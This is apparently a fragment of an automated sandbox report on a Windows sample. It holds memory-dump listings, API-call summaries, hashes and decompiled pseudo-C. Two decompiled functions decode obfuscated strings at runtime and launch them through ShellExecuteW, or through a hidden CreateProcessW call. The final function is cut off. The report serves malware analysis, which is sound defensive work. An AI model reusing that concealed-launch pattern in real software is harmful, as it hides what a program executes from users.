                                                                                        • Associated: 00000000.00000002.731860109.000000000180E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExitHandleThread$CloseFreeLibraryModule_free
                                                                                        • String ID:
                                                                                        • API String ID: 712693623-0
                                                                                        • Opcode ID: 43b0197813fcd3d22c6023370c12064fd5f5d388a672748a67acff6575bb001d
                                                                                        • Instruction ID: 617a19a3ebfc19a561fe5dd382d1f93f46072566cb05a13127b1eebb2b57cfe3
                                                                                        • Opcode Fuzzy Hash: 43b0197813fcd3d22c6023370c12064fd5f5d388a672748a67acff6575bb001d
                                                                                        • Instruction Fuzzy Hash: C3115EB5A007646BDB209B65C809FEB7B9AEF00760F044618FE558B790EB71EE818794
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.721377844.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.721360804.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.722085107.0000000000811000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723189213.000000000090D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723221613.0000000000913000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723221613.0000000001313000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731812655.00000000017F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731827637.00000000017F6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731837813.00000000017FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731837813.0000000001808000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731860109.000000000180E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: j
                                                                                        • API String ID: 0-3613250677
                                                                                        • Opcode ID: be6bdf58c4c964fbe4812c2474d882b591c3eef47a07d986422b4a7ba083b0ba
                                                                                        • Instruction ID: 1303cfb1bd8c1df06e8adf2820185695b8976e0993f6b38909c5b8f817e73e9c
                                                                                        • Opcode Fuzzy Hash: be6bdf58c4c964fbe4812c2474d882b591c3eef47a07d986422b4a7ba083b0ba
                                                                                        • Instruction Fuzzy Hash: A051C17191424AABCF11AFA4C845FFEBBBAEF4A314F10015DF405A7291D7349E42CBA9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(009066E0,00000010), ref: 006B3307
                                                                                        • ExitThread.KERNEL32 ref: 006B330E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.721377844.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.721360804.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.722085107.0000000000811000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723189213.000000000090D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723221613.0000000000913000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723221613.0000000001313000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731812655.00000000017F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731827637.00000000017F6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731837813.00000000017FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731837813.0000000001808000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731860109.000000000180E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorExitLastThread
                                                                                        • String ID: P1@
                                                                                        • API String ID: 1611280651-595374464
                                                                                        • Opcode ID: 38b27fc992175830136b036295c83fae77c6f649e8bf915af953dec4029b8abd
                                                                                        • Instruction ID: 4969b580c0df64426e9d236966ae0beaa1cbcc8d98ab92d59b893209a3641bdf
                                                                                        • Opcode Fuzzy Hash: 38b27fc992175830136b036295c83fae77c6f649e8bf915af953dec4029b8abd
                                                                                        • Instruction Fuzzy Hash: 91F08CB5640219AFDF00AB70D80AAED3B76FF44700F10814DF5055B392DB75AA41CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 120 6c500d-6c5025 call 6bd269 123 6c5038-6c504e SetFilePointerEx 120->123 124 6c5027-6c502c call 6a923a 120->124 126 6c505f-6c5069 123->126 127 6c5050-6c505d GetLastError call 6a9204 123->127 130 6c5032-6c5036 124->130 129 6c506b-6c5080 126->129 126->130 127->130 133 6c5085-6c508a 129->133 130->133
                                                                                        APIs
                                                                                        • SetFilePointerEx.KERNEL32(00000000,00000003,00000002,0000000C,00000000,00000000,?,00000001,00000001,?,006C50BC,0000000C,00000003,00000002,00000000), ref: 006C5046
                                                                                        • GetLastError.KERNEL32(?,006C50BC,0000000C,00000003,00000002,00000000,?,006C62A7,?,00000000,00000000,00000002,00000003,0000000C,00000003,00000003), ref: 006C5050
                                                                                        • __dosmaperr.LIBCMT ref: 006C5057
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.721377844.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.721360804.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.722085107.0000000000811000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723189213.000000000090D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723221613.0000000000913000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723221613.0000000001313000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731812655.00000000017F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731827637.00000000017F6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731837813.00000000017FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731837813.0000000001808000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731860109.000000000180E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastPointer__dosmaperr
                                                                                        • String ID:
                                                                                        • API String ID: 2336955059-0
                                                                                        • Opcode ID: 3567163290fba7b3400486bb8167e1c97c09655ff5bd37bdf8bda4ac4855bbfa
                                                                                        • Instruction ID: 336790b7f7c0e68018472dcb10b262af6fc041aeec46fcc4b8496e8d1daef075
                                                                                        • Opcode Fuzzy Hash: 3567163290fba7b3400486bb8167e1c97c09655ff5bd37bdf8bda4ac4855bbfa
                                                                                        • Instruction Fuzzy Hash: 9601B9327105196BCB159B59DC05DEE771AEB85320B24424DF912D7291EA71AD418BA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 66%
                                                                                        			E10001270(void* __edi, void* __esi, short* _a4, intOrPtr _a8) {
                                                                                        				signed int _v8;
                                                                                        				short _v12;
                                                                                        				short _v20;
                                                                                        				short _v24;
                                                                                        				short _v40;
                                                                                        				signed int _t41;
                                                                                        				short _t43;
                                                                                        				short _t50;
                                                                                        				void* _t57;
                                                                                        				short _t61;
                                                                                        				short* _t89;
                                                                                        				signed int _t91;
                                                                                        				signed int _t92;
                                                                                        				signed int _t93;
                                                                                        
                                                                                        				_t41 =  *0x1001a004; // 0xcfb68a75
                                                                                        				_v8 = _t41 ^ _t93;
                                                                                        				_t91 = 0;
                                                                                        				_t89 = _a4;
                                                                                        				if(_a8 == 0) {
                                                                                        					asm("movups xmm0, [0x100188f4]");
                                                                                        					_t43 =  *0x10018904; // 0x40
                                                                                        					_v24 = _t43;
                                                                                        					asm("movups [ebp-0x24], xmm0");
                                                                                        					do {
                                                                                        						 *(_t93 + _t91 * 2 - 0x24) =  *(_t93 + _t91 * 2 - 0x24) ^ _t91 - ((0x094f2095 * _t91 >> 0x00000020 >> 0x00000001 >> 0x0000001f) + (0x094f2095 * _t91 >> 0x00000020 >> 0x00000001)) * 0x00000037 + 0x00000038;
                                                                                        						_t91 = _t91 + 1;
                                                                                        					} while (_t91 < 9);
                                                                                        					asm("movq xmm0, [0x10018908]");
                                                                                        					_t92 = 0;
                                                                                        					_t50 =  *0x10018910; // 0x3c
                                                                                        					asm("movq [ebp-0x10], xmm0");
                                                                                        					_v12 = _t50;
                                                                                        					do {
                                                                                        						 *(_t93 + _t92 * 2 - 0x10) =  *(_t93 + _t92 * 2 - 0x10) ^ _t92 - ((0x094f2095 * _t92 >> 0x00000020 >> 0x00000001 >> 0x0000001f) + (0x094f2095 * _t92 >> 0x00000020 >> 0x00000001)) * 0x00000037 + 0x00000038;
                                                                                        						_t92 = _t92 + 1;
                                                                                        					} while (_t92 < 5);
                                                                                        					_t57 = GetDesktopWindow();
                                                                                        					ShellExecuteW(_t57,  &_v20,  &_v40, _t89, 0, 5);
                                                                                        				} else {
                                                                                        					asm("movq xmm0, [0x10018908]");
                                                                                        					_t61 =  *0x10018910; // 0x3c
                                                                                        					asm("movq [ebp-0x10], xmm0");
                                                                                        					_v12 = _t61;
                                                                                        					do {
                                                                                        						 *(_t93 + _t91 * 2 - 0x10) =  *(_t93 + _t91 * 2 - 0x10) ^ _t91 - ((0x094f2095 * _t91 >> 0x00000020 >> 0x00000001 >> 0x0000001f) + (0x094f2095 * _t91 >> 0x00000020 >> 0x00000001)) * 0x00000037 + 0x00000038;
                                                                                        						_t91 = _t91 + 1;
                                                                                        					} while (_t91 < 5);
                                                                                        					ShellExecuteW(0,  &_v20, _t89, 0, 0, 1);
                                                                                        				}
                                                                                        				return E1000296F(_v8 ^ _t93);
                                                                                        			}

















                                                                                        0x10001276
                                                                                        0x1000127d
                                                                                        0x10001281
                                                                                        0x10001284
                                                                                        0x1000128a
                                                                                        0x100012da
                                                                                        0x100012e1
                                                                                        0x100012e7
                                                                                        0x100012eb
                                                                                        0x100012f0
                                                                                        0x1000130a
                                                                                        0x1000130f
                                                                                        0x10001310
                                                                                        0x10001315
                                                                                        0x1000131d
                                                                                        0x1000131f
                                                                                        0x10001325
                                                                                        0x1000132a
                                                                                        0x10001330
                                                                                        0x1000134a
                                                                                        0x1000134f
                                                                                        0x10001350
                                                                                        0x10001355
                                                                                        0x10001369
                                                                                        0x1000128c
                                                                                        0x1000128c
                                                                                        0x10001294
                                                                                        0x1000129a
                                                                                        0x1000129f
                                                                                        0x100012a3
                                                                                        0x100012bd
                                                                                        0x100012c2
                                                                                        0x100012c3
                                                                                        0x10001369
                                                                                        0x10001369
                                                                                        0x10001383

                                                                                        APIs
                                                                                        • GetDesktopWindow.USER32 ref: 10001355
                                                                                        • ShellExecuteW.SHELL32(00000000,?,?,?,00000000,00000005), ref: 10001369
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.661084660.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000000.00000003.373928207.000000001001D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661074193.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661103501.0000000010013000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661115201.000000001001A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661124775.000000001001C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_10000000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: DesktopExecuteShellWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2449286647-0
                                                                                        • Opcode ID: d8d90fc7f8d7f408b2a44c2c0cf6a7d60795ec036a2b2caca5668299d7c6bd3c
                                                                                        • Instruction ID: 06f97c76d9260ddbd25a23df95dd09840a25681481beec42d586ef684bab4896
                                                                                        • Opcode Fuzzy Hash: d8d90fc7f8d7f408b2a44c2c0cf6a7d60795ec036a2b2caca5668299d7c6bd3c
                                                                                        • Instruction Fuzzy Hash: 0C310A32A0052957D708DFB88D517FEB7B8EB59700F45912AFE42EB290E670EB8183C4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 67%
                                                                                        			E10001160(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                        				signed int _v8;
                                                                                        				short _v1032;
                                                                                        				intOrPtr _v1036;
                                                                                        				short _v1044;
                                                                                        				struct _PROCESS_INFORMATION _v1060;
                                                                                        				struct _STARTUPINFOW _v1128;
                                                                                        				signed int _t25;
                                                                                        				intOrPtr _t29;
                                                                                        				intOrPtr _t50;
                                                                                        				intOrPtr _t59;
                                                                                        				signed int _t61;
                                                                                        				signed int _t63;
                                                                                        
                                                                                        				_t25 =  *0x1001a004; // 0xcfb68a75
                                                                                        				_v8 = _t25 ^ _t63;
                                                                                        				_t50 = _a8;
                                                                                        				_t59 = _a4;
                                                                                        				E10003E50(_t59,  &_v1032, 0, 0x400);
                                                                                        				asm("movq xmm0, [0x10018914]");
                                                                                        				_t29 =  *0x1001891c; // 0x3d004f
                                                                                        				asm("movq [ebp-0x410], xmm0");
                                                                                        				_v1036 = _t29;
                                                                                        				if( *0x1001891e != 0) {
                                                                                        					_t61 = 0;
                                                                                        					do {
                                                                                        						 *(_t63 + _t61 * 2 - 0x410) =  *(_t63 + _t61 * 2 - 0x410) ^ _t61 - ((0x094f2095 * _t61 >> 0x00000020 >> 0x00000001 >> 0x0000001f) + (0x094f2095 * _t61 >> 0x00000020 >> 0x00000001)) * 0x00000037 + 0x00000038;
                                                                                        						_t61 = _t61 + 1;
                                                                                        					} while (_t61 < 6);
                                                                                        				}
                                                                                        				wsprintfW( &_v1032,  &_v1044, _t59, _t50);
                                                                                        				E10003E50(_t59,  &_v1128, 0, 0x44);
                                                                                        				_v1128.dwFlags = 1;
                                                                                        				asm("xorps xmm0, xmm0");
                                                                                        				_v1128.wShowWindow = 0;
                                                                                        				asm("movups [ebp-0x420], xmm0");
                                                                                        				CreateProcessW(0,  &_v1032, 0, 0, 0, 0, 0, 0,  &_v1128,  &_v1060); // executed
                                                                                        				asm("sbb eax, eax");
                                                                                        				return E1000296F(_v8 ^ _t63);
                                                                                        			}















                                                                                        0x10001169
                                                                                        0x10001170
                                                                                        0x10001174
                                                                                        0x1000117e
                                                                                        0x10001189
                                                                                        0x1000118e
                                                                                        0x100011a1
                                                                                        0x100011a6
                                                                                        0x100011ae
                                                                                        0x100011b4
                                                                                        0x100011b7
                                                                                        0x100011c0
                                                                                        0x100011da
                                                                                        0x100011e2
                                                                                        0x100011e3
                                                                                        0x100011e8
                                                                                        0x100011f9
                                                                                        0x1000120a
                                                                                        0x10001212
                                                                                        0x1000121e
                                                                                        0x10001221
                                                                                        0x1000122e
                                                                                        0x10001252
                                                                                        0x1000125e
                                                                                        0x1000126d

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.661084660.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000000.00000003.373928207.000000001001D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661074193.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661103501.0000000010013000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661115201.000000001001A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661124775.000000001001C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_10000000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcesswsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 3691570402-0
                                                                                        • Opcode ID: f644ea3b934adbdb55604b3e6aa45f4df8046e52641d158c2f8837e610949c2d
                                                                                        • Instruction ID: 7a34290fa4ebaabbe9a06d8811445c1d103f8df6cf20f39f67bb2b11b1e0f6f2
                                                                                        • Opcode Fuzzy Hash: f644ea3b934adbdb55604b3e6aa45f4df8046e52641d158c2f8837e610949c2d
                                                                                        • Instruction Fuzzy Hash: C6218BB6A0021C97DB10DF64CD45BEAB7FCEB49704F4481A6F709E7181E770AB848B99
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 134 6c8110-6c811c 135 6c814e-6c8159 call 6a923a 134->135 136 6c811e-6c8120 134->136 144 6c815b-6c815d 135->144 137 6c8139-6c814a RtlAllocateHeap 136->137 138 6c8122-6c8123 136->138 140 6c814c 137->140 141 6c8125-6c812c call 6bf736 137->141 138->137 140->144 141->135 146 6c812e-6c8137 call 6cce6b 141->146 146->135 146->137
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000003,00000003,?,006C8096,00001000,00000000,?,?,?,006C09FB,00000000,00000000,00000000,?,?), ref: 006C8142
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.721377844.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.721360804.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.722085107.0000000000811000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723189213.000000000090D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723221613.0000000000913000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723221613.0000000001313000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731812655.00000000017F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731827637.00000000017F6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731837813.00000000017FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731837813.0000000001808000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731860109.000000000180E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: 66cee4d8bac1e1f3f5fbc9c6528455b29aee6d21bedba87a067c42205bee83d1
                                                                                        • Instruction ID: 4a682dfdfd9a9183d67ad715c3c092faf4e53227b5a2320794dedc7d5663ddbe
                                                                                        • Opcode Fuzzy Hash: 66cee4d8bac1e1f3f5fbc9c6528455b29aee6d21bedba87a067c42205bee83d1
                                                                                        • Instruction Fuzzy Hash: B6E030212006166AEA722A659D05FFA76CBEB82BB0F19412DAC1497A90DF209D0346A4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 66%
                                                                                        			E1000CFDE(void* __ebx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
                                                                                        				signed int _v8;
                                                                                        				signed int _v32;
                                                                                        				signed int _v36;
                                                                                        				char _v460;
                                                                                        				signed int _v464;
                                                                                        				void _v468;
                                                                                        				signed int _v472;
                                                                                        				signed int _v932;
                                                                                        				signed int _v936;
                                                                                        				signed int _v1392;
                                                                                        				signed int _v1396;
                                                                                        				signed int _v1400;
                                                                                        				char _v1860;
                                                                                        				signed int _v1864;
                                                                                        				signed int _v1865;
                                                                                        				signed int _v1872;
                                                                                        				signed int _v1876;
                                                                                        				signed int _v1880;
                                                                                        				signed int _v1884;
                                                                                        				signed int _v1888;
                                                                                        				signed int _v1892;
                                                                                        				signed int _v1896;
                                                                                        				intOrPtr _v1900;
                                                                                        				signed int _v1904;
                                                                                        				signed int _v1908;
                                                                                        				signed int _v1912;
                                                                                        				signed int _v1916;
                                                                                        				signed int _v1920;
                                                                                        				signed int _v1924;
                                                                                        				signed int _v1928;
                                                                                        				char _v1936;
                                                                                        				char _v1944;
                                                                                        				char _v2404;
                                                                                        				signed int _v2408;
                                                                                        				signed int _t743;
                                                                                        				signed int _t753;
                                                                                        				signed int _t754;
                                                                                        				intOrPtr _t763;
                                                                                        				signed int _t764;
                                                                                        				signed char _t766;
                                                                                        				intOrPtr _t767;
                                                                                        				intOrPtr _t770;
                                                                                        				intOrPtr _t772;
                                                                                        				intOrPtr _t773;
                                                                                        				void* _t774;
                                                                                        				signed int _t778;
                                                                                        				signed int _t779;
                                                                                        				signed int _t785;
                                                                                        				signed int _t791;
                                                                                        				intOrPtr _t793;
                                                                                        				void* _t794;
                                                                                        				signed int _t795;
                                                                                        				signed int _t796;
                                                                                        				signed int _t797;
                                                                                        				signed int _t806;
                                                                                        				signed int _t811;
                                                                                        				signed int _t812;
                                                                                        				signed int _t813;
                                                                                        				signed int _t816;
                                                                                        				signed int _t817;
                                                                                        				signed int _t818;
                                                                                        				signed int _t820;
                                                                                        				signed int _t821;
                                                                                        				signed int _t822;
                                                                                        				signed int _t823;
                                                                                        				signed int _t828;
                                                                                        				signed int _t829;
                                                                                        				signed int _t835;
                                                                                        				signed int _t836;
                                                                                        				signed int _t839;
                                                                                        				signed int _t844;
                                                                                        				signed int _t852;
                                                                                        				signed int* _t855;
                                                                                        				signed int _t859;
                                                                                        				signed int _t870;
                                                                                        				signed int _t871;
                                                                                        				signed int _t873;
                                                                                        				char* _t874;
                                                                                        				signed int _t877;
                                                                                        				signed int _t881;
                                                                                        				signed int _t882;
                                                                                        				signed int _t887;
                                                                                        				signed int _t889;
                                                                                        				signed int _t894;
                                                                                        				signed int _t903;
                                                                                        				signed int _t906;
                                                                                        				signed int _t908;
                                                                                        				signed int _t911;
                                                                                        				signed int _t912;
                                                                                        				signed int _t913;
                                                                                        				signed int _t916;
                                                                                        				signed int _t929;
                                                                                        				signed int _t930;
                                                                                        				signed int _t932;
                                                                                        				char* _t933;
                                                                                        				signed int _t936;
                                                                                        				signed int _t940;
                                                                                        				signed int _t941;
                                                                                        				signed int* _t943;
                                                                                        				signed int _t946;
                                                                                        				signed int _t948;
                                                                                        				signed int _t953;
                                                                                        				signed int _t961;
                                                                                        				signed int _t964;
                                                                                        				signed int _t968;
                                                                                        				signed int* _t975;
                                                                                        				intOrPtr _t977;
                                                                                        				void* _t978;
                                                                                        				intOrPtr* _t980;
                                                                                        				signed int* _t984;
                                                                                        				unsigned int _t995;
                                                                                        				signed int _t996;
                                                                                        				void* _t999;
                                                                                        				signed int _t1000;
                                                                                        				void* _t1002;
                                                                                        				signed int _t1003;
                                                                                        				signed int _t1004;
                                                                                        				signed int _t1005;
                                                                                        				signed int _t1015;
                                                                                        				signed int _t1020;
                                                                                        				signed int _t1023;
                                                                                        				unsigned int _t1026;
                                                                                        				signed int _t1027;
                                                                                        				void* _t1030;
                                                                                        				signed int _t1031;
                                                                                        				void* _t1033;
                                                                                        				signed int _t1034;
                                                                                        				signed int _t1035;
                                                                                        				signed int _t1036;
                                                                                        				signed int _t1041;
                                                                                        				signed int* _t1046;
                                                                                        				signed int _t1048;
                                                                                        				signed int _t1058;
                                                                                        				void _t1061;
                                                                                        				signed int _t1064;
                                                                                        				void* _t1067;
                                                                                        				void* _t1074;
                                                                                        				signed int _t1080;
                                                                                        				signed int _t1081;
                                                                                        				signed int _t1084;
                                                                                        				signed int _t1085;
                                                                                        				signed int _t1087;
                                                                                        				signed int _t1088;
                                                                                        				signed int _t1089;
                                                                                        				signed int _t1093;
                                                                                        				signed int _t1097;
                                                                                        				signed int _t1098;
                                                                                        				signed int _t1099;
                                                                                        				signed int _t1101;
                                                                                        				signed int _t1102;
                                                                                        				signed int _t1103;
                                                                                        				signed int _t1104;
                                                                                        				signed int _t1105;
                                                                                        				signed int _t1106;
                                                                                        				signed int _t1108;
                                                                                        				signed int _t1109;
                                                                                        				signed int _t1110;
                                                                                        				signed int _t1111;
                                                                                        				signed int _t1112;
                                                                                        				signed int _t1113;
                                                                                        				unsigned int _t1114;
                                                                                        				void* _t1117;
                                                                                        				intOrPtr _t1119;
                                                                                        				signed int _t1120;
                                                                                        				signed int _t1121;
                                                                                        				signed int _t1122;
                                                                                        				signed int* _t1126;
                                                                                        				void* _t1130;
                                                                                        				void* _t1131;
                                                                                        				signed int _t1132;
                                                                                        				signed int _t1133;
                                                                                        				signed int _t1134;
                                                                                        				signed int _t1137;
                                                                                        				signed int _t1138;
                                                                                        				signed int _t1143;
                                                                                        				signed int _t1145;
                                                                                        				signed int _t1148;
                                                                                        				char _t1153;
                                                                                        				signed int _t1155;
                                                                                        				signed int _t1156;
                                                                                        				signed int _t1157;
                                                                                        				signed int _t1158;
                                                                                        				signed int _t1159;
                                                                                        				signed int _t1160;
                                                                                        				signed int _t1161;
                                                                                        				signed int _t1165;
                                                                                        				signed int _t1166;
                                                                                        				signed int _t1167;
                                                                                        				signed int _t1168;
                                                                                        				signed int _t1169;
                                                                                        				unsigned int _t1172;
                                                                                        				void* _t1176;
                                                                                        				void* _t1177;
                                                                                        				unsigned int _t1178;
                                                                                        				signed int _t1183;
                                                                                        				signed int _t1184;
                                                                                        				signed int _t1186;
                                                                                        				signed int _t1187;
                                                                                        				intOrPtr* _t1189;
                                                                                        				signed int _t1190;
                                                                                        				signed int _t1192;
                                                                                        				signed int _t1193;
                                                                                        				signed int _t1196;
                                                                                        				signed int _t1198;
                                                                                        				signed int _t1199;
                                                                                        				void* _t1200;
                                                                                        				signed int _t1201;
                                                                                        				signed int _t1202;
                                                                                        				signed int _t1203;
                                                                                        				void* _t1206;
                                                                                        				signed int _t1207;
                                                                                        				signed int _t1208;
                                                                                        				signed int _t1209;
                                                                                        				signed int _t1210;
                                                                                        				signed int _t1211;
                                                                                        				signed int* _t1214;
                                                                                        				signed int _t1215;
                                                                                        				signed int _t1216;
                                                                                        				signed int _t1217;
                                                                                        				signed int _t1218;
                                                                                        				intOrPtr* _t1220;
                                                                                        				intOrPtr* _t1221;
                                                                                        				signed int _t1223;
                                                                                        				signed int _t1225;
                                                                                        				signed int _t1228;
                                                                                        				signed int _t1234;
                                                                                        				signed int _t1238;
                                                                                        				signed int _t1239;
                                                                                        				signed int _t1244;
                                                                                        				signed int _t1247;
                                                                                        				signed int _t1248;
                                                                                        				signed int _t1249;
                                                                                        				signed int _t1250;
                                                                                        				signed int _t1251;
                                                                                        				signed int _t1252;
                                                                                        				signed int _t1254;
                                                                                        				signed int _t1255;
                                                                                        				signed int _t1256;
                                                                                        				signed int _t1257;
                                                                                        				signed int _t1259;
                                                                                        				signed int _t1260;
                                                                                        				signed int _t1261;
                                                                                        				signed int _t1262;
                                                                                        				signed int _t1263;
                                                                                        				signed int _t1265;
                                                                                        				signed int _t1266;
                                                                                        				signed int _t1268;
                                                                                        				signed int _t1270;
                                                                                        				signed int _t1272;
                                                                                        				signed int _t1275;
                                                                                        				signed int _t1277;
                                                                                        				signed int* _t1278;
                                                                                        				signed int* _t1281;
                                                                                        				signed int _t1290;
                                                                                        
                                                                                        				_t1275 = _t1277;
                                                                                        				_t1278 = _t1277 - 0x964;
                                                                                        				_t743 =  *0x1001a004; // 0xcfb68a75
                                                                                        				_v8 = _t743 ^ _t1275;
                                                                                        				_t1058 = _a20;
                                                                                        				_push(__esi);
                                                                                        				_push(__edi);
                                                                                        				_t1189 = _a16;
                                                                                        				_v1924 = _t1189;
                                                                                        				_v1920 = _t1058;
                                                                                        				E1000CB05( &_v1944, __eflags);
                                                                                        				_t1238 = _a8;
                                                                                        				_t748 = 0x2d;
                                                                                        				if((_t1238 & 0x80000000) == 0) {
                                                                                        					_t748 = 0x120;
                                                                                        				}
